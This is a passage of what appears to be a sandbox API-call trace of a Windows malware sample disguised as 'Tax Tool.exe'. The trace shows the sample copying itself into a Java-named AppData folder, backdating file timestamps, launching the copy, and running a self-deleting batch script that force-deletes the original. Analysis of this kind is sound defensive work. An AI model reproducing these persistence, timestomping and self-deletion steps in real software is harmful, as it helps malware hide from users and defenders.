pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="8A") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="00") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="00") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="00") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="B7") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="49") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="67") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="98") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="F6") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="14") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="59") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="35") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="AA") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="3E") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="27") returned 2 [0057.823] wvnsprintfW (in: pszDest=0x9ae4e0, cchDest=6, pszFmt="%02X", arglist=0x9ae4bc | out: pszDest="60") returned 2 [0057.823] CreateMutexW (lpMutexAttributes=0x15e89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x210 [0057.824] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0xffffffff) returned 0x0 [0057.824] PathRemoveFileSpecW (in: pszPath="" | out: pszPath="") returned 0 [0057.824] PathSkipRootW (pszPath="") returned 0x0 [0057.824] GetFileAttributesW (lpFileName="") returned 0xffffffff [0057.824] CreateDirectoryW (lpPathName="", lpSecurityAttributes=0x0) returned 0 [0057.824] GetCurrentThread () returned 0xfffffffe [0057.824] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x9ae744 | out: TokenHandle=0x9ae744*=0x0) returned 0 [0057.824] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x9ae744 | out: TokenHandle=0x9ae744*=0x214) returned 1 [0057.824] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x9ae74c | out: lpLuid=0x9ae74c*(LowPart=0x8, HighPart=0)) returned 1 [0057.825] AdjustTokenPrivileges (in: TokenHandle=0x214, DisableAllPrivileges=0, NewState=0x9ae748*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0057.825] GetLastError () returned 0x0 [0057.825] CloseHandle (hObject=0x214) returned 1 [0057.825] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0057.825] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0xb0c738, lpbSaclPresent=0x9ae77c, pSacl=0x9ae770, lpbSaclDefaulted=0x9ae778 | out: lpbSaclPresent=0x9ae77c, pSacl=0x9ae770, lpbSaclDefaulted=0x9ae778) returned 1 [0057.825] SetNamedSecurityInfoW () returned 0x7b [0057.826] LocalFree (hMem=0xb0c738) returned 0x0 [0057.826] GetFileAttributesW (lpFileName="") returned 0xffffffff [0057.829] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.831] wvnsprintfA (in: pszDest=0xdd14b0, cchDest=21, pszFmt="%d", arglist=0x9ae6e0 | out: pszDest="1476366140") returned 10 [0057.832] CreateFileW (lpFileName="", dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.834] ReleaseMutex (hMutex=0x210) returned 1 [0057.834] CloseHandle (hObject=0x210) returned 1 [0057.835] SetLastError (dwErrCode=0xea) [0057.836] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\desktop\\tax tool.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.836] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x9aea00 | out: lpFileSize=0x9aea00*=124416) returned 1 [0057.836] VirtualAlloc (lpAddress=0x0, dwSize=0x1e600, flAllocationType=0x3000, flProtect=0x4) returned 0xa30000 [0057.836] ReadFile (in: hFile=0x210, lpBuffer=0xa30000, nNumberOfBytesToRead=0x1e600, lpNumberOfBytesRead=0x9aea0c, lpOverlapped=0x0 | out: lpBuffer=0xa30000*, lpNumberOfBytesRead=0x9aea0c*=0x1e600, lpOverlapped=0x0) returned 1 [0057.840] SetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe", dwFileAttributes=0x20) returned 1 [0057.840] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\sun\\java\\devices.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0057.841] WriteFile (in: hFile=0x214, lpBuffer=0xa30000*, nNumberOfBytesToWrite=0x1e600, lpNumberOfBytesWritten=0x9ae9ec, lpOverlapped=0x0 | out: lpBuffer=0xa30000*, lpNumberOfBytesWritten=0x9ae9ec, lpOverlapped=0x0) returned 1 [0057.844] CloseHandle (hObject=0x214) returned 1 [0057.850] CloseHandle (hObject=0x210) returned 1 [0057.850] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe", NtPathName=0x9ae9e0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0057.850] NtCreateFile (in: FileHandle=0x9ae9c8, DesiredAccess=0x10, ObjectAttributes=0x9ae9e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\sun\\java\\devices.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x9ae9d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x40, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x9ae9c8*=0x210, IoStatusBlock=0x9ae9d8*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0057.851] NtSetEaFile (FileHandle=0x210, IoStatusBlock=0x9ae9d8, EaBuffer=0xe4f648, EaBufferSize=0x30c) returned 0x0 [0057.853] NtClose (Handle=0x210) returned 0x0 [0057.853] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x210 [0057.854] GetFileTime (in: hFile=0x210, lpCreationTime=0x9aeb60, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x9aeb60*(dwLowDateTime=0x67df9f25, dwHighDateTime=0x1d10fd4), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0057.854] CloseHandle (hObject=0x210) returned 1 [0057.854] GetSystemTime (in: lpSystemTime=0x9ae900 | out: lpSystemTime=0x9ae900*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x14, wMilliseconds=0x115)) [0057.854] SystemTimeToFileTime (in: lpSystemTime=0x9ae900, lpFileTime=0x9ae8f0 | out: lpFileTime=0x9ae8f0) returned 1 [0057.854] PathIsDirectoryW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 0 [0057.854] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\sun\\java\\devices.exe"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.855] SetFileTime (hFile=0x210, lpCreationTime=0x9ae928, lpLastAccessTime=0x9ae928, lpLastWriteTime=0x9ae928) returned 1 [0057.855] CloseHandle (hObject=0x210) returned 1 [0057.855] PathRemoveFileSpecW (in: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0057.855] PathIsDirectoryW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0057.855] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\sun\\java"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.856] GetSystemTime (in: lpSystemTime=0x9ae900 | out: lpSystemTime=0x9ae900*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x14, wMilliseconds=0x115)) [0057.856] SystemTimeToFileTime (in: lpSystemTime=0x9ae900, lpFileTime=0x9ae8f0 | out: lpFileTime=0x9ae8f0) returned 1 [0057.856] PathIsDirectoryW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0 [0057.856] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.857] SetFileTime (hFile=0x210, lpCreationTime=0x9ae928, lpLastAccessTime=0x9ae928, lpLastWriteTime=0x9ae928) returned 1 [0057.857] CloseHandle (hObject=0x210) returned 1 [0057.857] PathRemoveFileSpecW (in: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 1 [0057.857] PathIsDirectoryW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 1 [0057.857] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.858] GetSystemTime (in: lpSystemTime=0x9ae900 | out: lpSystemTime=0x9ae900*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x14, wMilliseconds=0x115)) [0057.858] SystemTimeToFileTime (in: lpSystemTime=0x9ae900, lpFileTime=0x9ae8f0 | out: lpFileTime=0x9ae8f0) returned 1 [0057.858] PathIsDirectoryW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb") returned 0 [0057.858] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.858] SetFileTime (hFile=0x210, lpCreationTime=0x9ae928, lpLastAccessTime=0x9ae928, lpLastWriteTime=0x9ae928) returned 1 [0057.859] CloseHandle (hObject=0x210) returned 1 [0057.859] PathRemoveFileSpecW (in: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 1 [0057.859] PathIsDirectoryW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 1 [0057.859] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.859] GetSystemTime (in: lpSystemTime=0x9ae900 | out: lpSystemTime=0x9ae900*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x14, wMilliseconds=0x115)) [0057.859] SystemTimeToFileTime (in: lpSystemTime=0x9ae900, lpFileTime=0x9ae8f0 | out: lpFileTime=0x9ae8f0) returned 1 [0057.859] PathIsDirectoryW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Windows PowerShell (x86).ezu") returned 0 [0057.860] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Windows PowerShell (x86).ezu" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\windows powershell (x86).ezu"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.860] SetFileTime (hFile=0x210, lpCreationTime=0x9ae928, lpLastAccessTime=0x9ae928, lpLastWriteTime=0x9ae928) returned 1 [0057.860] CloseHandle (hObject=0x210) returned 1 [0057.860] PathRemoveFileSpecW (in: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Windows PowerShell (x86).ezu" | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 1 [0057.860] PathIsDirectoryW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 1 [0057.861] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0057.861] wvnsprintfW (in: pszDest=0xe4f648, cchDest=516, pszFmt="\"%s\"", arglist=0x9af89c | out: pszDest="\"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"") returned 66 [0057.861] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", lpStartupInfo=0x9af84c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x9af83c | out: lpCommandLine="\"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"", lpProcessInformation=0x9af83c*(hProcess=0x214, hThread=0x210, dwProcessId=0x84, dwThreadId=0xbcc)) returned 1 [0057.983] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="B3") returned 2 [0057.983] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="00") returned 2 [0057.983] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="00") returned 2 [0057.983] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="00") returned 2 [0057.983] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="9E") returned 2 [0057.983] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="9C") returned 2 [0057.983] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="21") returned 2 [0057.983] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="6B") returned 2 [0057.983] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="16") returned 2 [0057.983] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="6D") returned 2 [0057.984] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="44") returned 2 [0057.984] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="70") returned 2 [0057.984] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="93") returned 2 [0057.984] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="2D") returned 2 [0057.984] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="00") returned 2 [0057.984] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="78") returned 2 [0057.984] CreateEventW (lpEventAttributes=0x15e89c, bManualReset=1, bInitialState=0, lpName="B30000009E9C216B166D4470932D0078") returned 0x220 [0057.984] WaitForMultipleObjects (nCount=0x2, lpHandles=0x9af8cc*=0x220, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0069.346] CloseHandle (hObject=0x220) returned 1 [0069.346] CloseHandle (hObject=0x210) returned 1 [0069.346] CloseHandle (hObject=0x214) returned 1 [0069.346] ReleaseMutex (hMutex=0x1e0) returned 1 [0069.346] CloseHandle (hObject=0x1e0) returned 1 [0069.346] CharToOemW (in: pSrc="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe", pDst=0x9af784 | out: pDst="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe") returned 1 [0069.346] wvnsprintfA (in: pszDest=0x9af518, cchDest=620, pszFmt=":d\r\ndel /F /Q \"%s\"\r\nif exist \"%s\" goto d", arglist=0x9af510 | out: pszDest=":d\r\ndel /F /Q \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\"\r\nif exist \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" goto d") returned 132 [0069.346] GetTempPathW (in: nBufferLength=0xf6, lpBuffer=0x9aeb80 | out: lpBuffer="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\") returned 0x25 [0069.346] wvnsprintfW (in: pszDest=0x9aed88, cchDest=260, pszFmt="%s%08x.%s", arglist=0x9aeb6c | out: pszDest="upd823d0e12.bat") returned 15 [0069.346] PathCombineW (in: pszDest=0x9af2c0, pszDir="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\", pszFile="upd823d0e12.bat" | out: pszDest="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat") returned="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat" [0069.347] CreateFileW (lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat" (normalized: "c:\\users\\wi2yhm~1\\appdata\\local\\temp\\upd823d0e12.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0069.348] CloseHandle (hObject=0x1e0) returned 1 [0069.348] CharToOemW (in: pSrc="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat", pDst=0x9af1bc | out: pDst="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat") returned 1 [0069.348] wvnsprintfA (in: pszDest=0xe4f648, cchDest=540, pszFmt="@echo off\r\n%s\r\ndel /F \"%s\"\r\n", arglist=0x9aef94 | out: pszDest="@echo off\r\n:d\r\ndel /F /Q \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\"\r\nif exist \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" goto d\r\ndel /F \"C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat\"\r\n") returned 208 [0069.348] CreateFileW (lpFileName="C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat" (normalized: "c:\\users\\wi2yhm~1\\appdata\\local\\temp\\upd823d0e12.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0069.349] WriteFile (in: hFile=0x1e0, lpBuffer=0xe4f648*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x9aef8c, lpOverlapped=0x0 | out: lpBuffer=0xe4f648*, lpNumberOfBytesWritten=0x9aef8c, lpOverlapped=0x0) returned 1 [0069.350] CloseHandle (hObject=0x1e0) returned 1 [0069.351] wvnsprintfW (in: pszDest=0x9aefa0, cchDest=270, pszFmt="/c \"%s\"", arglist=0x9aef98 | out: pszDest="/c \"C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat\"") returned 57 [0069.352] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x9af2c0, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0069.352] wvnsprintfW (in: pszDest=0xe4f648, cchDest=519, pszFmt="\"%s\" %s", arglist=0x9aef74 | out: pszDest="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat\"") returned 87 [0069.352] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x9af4c8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x9aef18 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\WI2YHM~1\\AppData\\Local\\Temp\\upd823d0e12.bat\"", lpProcessInformation=0x9aef18*(hProcess=0x214, hThread=0x1e0, dwProcessId=0xcac, dwThreadId=0xcb0)) returned 1 [0069.600] CloseHandle (hObject=0x1e0) returned 1 [0069.600] CloseHandle (hObject=0x214) returned 1 [0069.600] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x9ec Process: id = "2" image_name = "devices.exe" filename = "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\sun\\java\\devices.exe" page_root = "0x490e4000" os_pid = "0x84" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x990" cmd_line = "\"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"" cur_dir = "C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\" Region: id = 214 start_va = 0xbd0000 end_va = 0xbf3fff entry_point = 0xbd0000 region_type = mapped_file name = "Devices.exe" filename = "\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" Region: id = 215 start_va = 0xc40000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 216 start_va = 0xc60000 end_va = 0xc61fff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 217 start_va = 0xc70000 end_va = 0xc83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c70000" filename = "" Region: id = 218 start_va = 0xc90000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 219 start_va = 0xcd0000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 220 start_va = 0x773d0000 end_va = 0x77548fff entry_point = 0x773d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" Region: id = 221 start_va = 0x7e4f0000 end_va = 0x7e512fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e4f0000" filename = "" Region: id = 222 start_va = 0x7e513000 end_va = 0x7e513fff entry_point = 0x0 region_type = private name = "private_0x000000007e513000" filename = "" Region: id = 223 start_va = 0x7e518000 end_va = 0x7e518fff entry_point = 0x0 region_type = private name = "private_0x000000007e518000" filename = "" Region: id = 224 start_va = 0x7e51d000 end_va = 0x7e51ffff entry_point = 0x0 region_type = private name = "private_0x000000007e51d000" filename = "" Region: id = 225 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 